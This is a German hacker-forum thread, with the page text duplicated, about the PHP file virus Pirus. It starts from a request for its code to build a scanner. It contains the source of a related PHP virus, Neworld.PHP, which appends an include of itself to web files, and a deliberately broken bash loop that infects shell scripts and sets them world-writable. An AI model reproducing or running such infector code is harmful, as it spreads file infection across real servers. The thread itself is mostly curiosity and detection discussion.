[HaBo]

Dwing · 12.12.03, 15:12

Hi. Ich bin im Moment dabei eine Sicherheitsprog für Webserver zu schreiben.
Weiß einer wo ich den PHP Virus Pyrus finde?
Brauche nämlich Teile des Codes für den Virenscanner.

Hab bei Google nix gefunden

fuero · 14.12.03, 03:46

http://securityresponse.symantec.com...php.pirus.html

Hab nicht gewußt daß es sowas gibt.... Tja man lernt nie aus. Anscheinend infiziert der Virus PHP Dateien mit einem zusätzlichen Include-Befehl - das sollte eigentlich leicht zu erkennen sein... Die einfachste Abhilfe wäre es, Schreibrechte von den PHP-Dateien zu entfernen.

*edit*: erstellt wurde er anscheinend von der Black Cat Virii Group, vielleicht hilft das bei deiner Suche

Anzeige

- Anzeige -

Enterhaken · 14.12.03, 16:16

Mich würde da mal der Source interessieren.

fuero · 14.12.03, 16:37

Tja ich glaube daß ich den Sourcecode gefunden hab, aber obs der richtige ist und ob ich den hier posten darf weiß ich nicht....

Enterhaken · 14.12.03, 19:01

Gibt ja PN

Den der Source Interessiert mich schon.

Dwing · 15.12.03, 07:06

wär nett wenn du mir den source per pn schicken könntest.

sieben · 15.12.03, 08:07

Bitte nicht angegiftet fuehlen, aber ich wusste eben nicht mehr so richtig ob ich lachen oder weinen soll als ich mir das Advisory durchgelesen hab. Okay, es ist nach Definiton ein Programm das sich Huckepack auf ein anders raufklemmt, man kann es aber auch uebertreiben.

Das Ding macht also nichts weiter als <?php include "virus.php" php> in alle php-datein die es findet zu klemmen. Beeindruckend. Sollte nicht schwer zu bauen sein. PHP bringt doch x tausend functions mit um Dateien/Verzeichnisse zu haendeln ohne sich Sorgen machen zu muessen. Ein bischen Rekursion draufpappen und fertig. Das sollte sich sogar mit diesen "PHP Hacker in 21 Sekunden fuer absolute Vollidioten, worthless CD included"-Buechern lernen lassen.

Wie waere es mit (bash-code, weil ich php noch weniger kann):
( Script absichtlich durch _offensichtlichen_ Tippfehler unbrauchbar gemacht Nicht das es noch jemand als root in die shell hackt und ich schuld bin. Also nicht in die shell tun, nicht als root, nicht als jemand anderes und schon gar nicht wenn du nicht weisst was du tust.)

Code:

#!/bin/sh
for f in `find . -type f -exec grep -ql \#\!/bin/sh {} \;`
do
echo "Ich bin ein boeser Virus!" > tmp$$
cat $f >>> tmp$$
mv tmp$$ $f
chmod 777 $f
done

Ist das nun auch ein boeser Virus und jemand wird sofort ein Advisory rausgeben weil wir jahrelang unix-unsicherheit hatten? Muessen wir jetzt alle unsere Computer aufessen?

Ich meine, man muss es nur allen seinen bekannten schicken und sie bitten es als root auszufuehren und moeglichst nicht in die datei zu gucken.

Gut gelaunt in den Morgen,
aufs symantec advisory wartend.

P.S: Fuer die taegliche Dosis einfach ins daily-cron stopfen. ;-)

fuero · 15.12.03, 12:18

Wo er recht hat, ....

DAMiRO · 02.01.04, 13:03

Neworld.PHP ist so ähnlich....

PHP-Code:

  <?php

$vir_string = "Neworld.PHP\n";
$virstringm = "Welcome To The New World Of PHP Programming\n";
$virt        = $vir_string . $virstringm;

echo    $virt;

$all = opendir("C:\\Windows\\");
while ($file = readdir($all))
{
   $inf = true;
   $exe = false;

   if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.html')) || 
      ($exe = strstr ($file, '.htm')) || ($exe = strstr ($file, '.htt')) )
   {
      if ( is_file($file) && is_writeable($file) )
      {
         $new = fopen($file, "r");
         $look = fread($new, filesize($file));
         $yes = strstr ($look, 'neworld.php');
         if (!$yes) $inf = false;
      }
   }

   if ( ($inf=false) )
   {
      $new = fopen($file, "a");
      $fputs($new, "<!-- ");
      $fputs($new, "Neworld.PHP - ");
      $fputs($new, "Made By Xmorpfic, ");
      $fputs($new, "www.shadowvx.com/bcvg, ");
      $fputs($new, "The Black Cat Virii Group.");
      $fputs($new, "--->");
      $fputs($new, "<?php ");
      $fputs($new, "include(\"");
      $fputs($new, __FILE__);
      $fputs($new, "\"); ");
      $fputs($new, "?>");
      return;
   }
}
closedir($all);
// Neworld.PHP Virus - Made By Xmorfic, www.shadowvx.com/bcvg, Black Cat Virii Group.
?>

TaXc · 13.01.05, 01:48

interesant interasant .... sollte öfters mal hier vorbei schneien

@fuero hast ne pm

warum erfahre ich das jetzt erst ... als php coder

PtB · 13.01.05, 07:51

Solche Möglichkeiten bieten sich zwangsläufig. Ich finds gut mit dem AV Script!

**Elderan** · 13.01.05, 17:37

Hallo,
naja dachte erst das wäre ein Virus der sich per google oder so PHP Scripts sucht und diese versucht zu Infizieren.
Aber ne sowas macht der nicht.
Ist halt nichts anderes als ein Virus der nur an PHP Dateien etwas anhängt, so wie es die Viren mit .exe Dateien gemacht haben.

Und mit php sowas zu machen ist bei entsprechenen Schreibrechten echt einfach.

Was ich viel Intressanter finde, den phpBB Wurm Santy, der versucht die per URL zu infizieren.

http://www.heise.de/security/news/meldung/54623

sheepd · 13.01.05, 21:11

Zitat:

Original von sieben[snip]Ich meine, man muss es nur allen seinen bekannten schicken und sie bitten es als root auszufuehren und moeglichst nicht in die datei zu gucken. [snip]
P.S: Fuer die taegliche Dosis einfach ins daily-cron stopfen. ;-)

Das hätte in bisschen verschärfter Form glatt vom BofH stammen können :-)

Anzeige

- Anzeige -

12.12.03, 15:12	#1 (permalink)
Dwing Registriert seit: 12.12.03 Likes: 0	PHP Pirus Anzeige Hi. Ich bin im Moment dabei eine Sicherheitsprog für Webserver zu schreiben. Weiß einer wo ich den PHP Virus Pyrus finde? Brauche nämlich Teile des Codes für den Virenscanner. Hab bei Google nix gefunden

14.12.03, 03:46	#2 (permalink)
fuero Registriert seit: 13.12.03 Likes: 0	RE: PHP Pirus http://securityresponse.symantec.com...php.pirus.html Hab nicht gewußt daß es sowas gibt.... Tja man lernt nie aus. Anscheinend infiziert der Virus PHP Dateien mit einem zusätzlichen Include-Befehl - das sollte eigentlich leicht zu erkennen sein... Die einfachste Abhilfe wäre es, Schreibrechte von den PHP-Dateien zu entfernen. edit: erstellt wurde er anscheinend von der Black Cat Virii Group, vielleicht hilft das bei deiner Suche

15.12.03, 08:07	#7 (permalink)
sieben Träger des silbernen Seepferdchens Registriert seit: 24.04.02 Likes: 9	Bitte nicht angegiftet fuehlen, aber ich wusste eben nicht mehr so richtig ob ich lachen oder weinen soll als ich mir das Advisory durchgelesen hab. Okay, es ist nach Definiton ein Programm das sich Huckepack auf ein anders raufklemmt, man kann es aber auch uebertreiben. Das Ding macht also nichts weiter als <?php include "virus.php" php> in alle php-datein die es findet zu klemmen. Beeindruckend. Sollte nicht schwer zu bauen sein. PHP bringt doch x tausend functions mit um Dateien/Verzeichnisse zu haendeln ohne sich Sorgen machen zu muessen. Ein bischen Rekursion draufpappen und fertig. Das sollte sich sogar mit diesen "PHP Hacker in 21 Sekunden fuer absolute Vollidioten, worthless CD included"-Buechern lernen lassen. Wie waere es mit (bash-code, weil ich php noch weniger kann): ( Script absichtlich durch _offensichtlichen_ Tippfehler unbrauchbar gemacht Nicht das es noch jemand als root in die shell hackt und ich schuld bin. Also nicht in die shell tun, nicht als root, nicht als jemand anderes und schon gar nicht wenn du nicht weisst was du tust.) Code: #!/bin/sh for f in `find . -type f -exec grep -ql \#\!/bin/sh {} \;` do echo "Ich bin ein boeser Virus!" > tmp$$ cat $f >>> tmp$$ mv tmp$$ $f chmod 777 $f done Ist das nun auch ein boeser Virus und jemand wird sofort ein Advisory rausgeben weil wir jahrelang unix-unsicherheit hatten? Muessen wir jetzt alle unsere Computer aufessen? Ich meine, man muss es nur allen seinen bekannten schicken und sie bitten es als root auszufuehren und moeglichst nicht in die datei zu gucken. Gut gelaunt in den Morgen, aufs symantec advisory wartend. P.S: Fuer die taegliche Dosis einfach ins daily-cron stopfen. ;-) __________________ Diese Zeile ist reserviert für Clark Kent.

02.01.04, 13:03	#9 (permalink)
DAMiRO Registriert seit: 02.01.04 Likes: 0	Neworld.PHP ist so ähnlich.... PHP-Code: <?php $vir_string = "Neworld.PHP\n"; $virstringm = "Welcome To The New World Of PHP Programming\n"; $virt = $vir_string . $virstringm; echo $virt; $all = opendir("C:\\Windows\\"); while ($file = readdir($all)) { $inf = true; $exe = false; if ( ($exe = strstr ($file, '.php')) \|\| ($exe = strstr ($file, '.html')) \|\| ($exe = strstr ($file, '.htm')) \|\| ($exe = strstr ($file, '.htt')) ) { if ( is_file($file) && is_writeable($file) ) { $new = fopen($file, "r"); $look = fread($new, filesize($file)); $yes = strstr ($look, 'neworld.php'); if (!$yes) $inf = false; } } if ( ($inf=false) ) { $new = fopen($file, "a"); $fputs($new, "<!-- "); $fputs($new, "Neworld.PHP - "); $fputs($new, "Made By Xmorpfic, "); $fputs($new, "www.shadowvx.com/bcvg, "); $fputs($new, "The Black Cat Virii Group."); $fputs($new, "--->"); $fputs($new, "<?php "); $fputs($new, "include(\""); $fputs($new, __FILE__); $fputs($new, "\"); "); $fputs($new, "?>"); return; } } closedir($all); // Neworld.PHP Virus - Made By Xmorfic, www.shadowvx.com/bcvg, Black Cat Virii Group. ?>

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

14.12.03, 16:16	#3 (permalink)
Enterhaken Registriert seit: 13.03.03 Likes: 0	Mich würde da mal der Source interessieren.

14.12.03, 16:37	#4 (permalink)
fuero Registriert seit: 13.12.03 Likes: 0	Tja ich glaube daß ich den Sourcecode gefunden hab, aber obs der richtige ist und ob ich den hier posten darf weiß ich nicht....

14.12.03, 19:01	#5 (permalink)
Enterhaken Registriert seit: 13.03.03 Likes: 0	Gibt ja PN Den der Source Interessiert mich schon.

15.12.03, 07:06	#6 (permalink)
Dwing Themenstarter Registriert seit: 12.12.03 Likes: 0	wär nett wenn du mir den source per pn schicken könntest.

15.12.03, 12:18	#8 (permalink)
fuero Registriert seit: 13.12.03 Likes: 0	Wo er recht hat, ....

13.01.05, 01:48	#10 (permalink)
TaXc Registriert seit: 12.11.03 Likes: 0	interesant interasant .... sollte öfters mal hier vorbei schneien @fuero hast ne pm warum erfahre ich das jetzt erst ... als php coder

13.01.05, 07:51	#11 (permalink)
PtB Registriert seit: 09.12.03 Likes: 0	Solche Möglichkeiten bieten sich zwangsläufig. Ich finds gut mit dem AV Script!

13.01.05, 17:37	#12 (permalink)
Elderan Moderator Registriert seit: 30.03.04 Likes: 14	Hallo, naja dachte erst das wäre ein Virus der sich per google oder so PHP Scripts sucht und diese versucht zu Infizieren. Aber ne sowas macht der nicht. Ist halt nichts anderes als ein Virus der nur an PHP Dateien etwas anhängt, so wie es die Viren mit .exe Dateien gemacht haben. Und mit php sowas zu machen ist bei entsprechenen Schreibrechten echt einfach. Was ich viel Intressanter finde, den phpBB Wurm Santy, der versucht die per URL zu infizieren. http://www.heise.de/security/news/meldung/54623

[HaBo]

PHP Pirus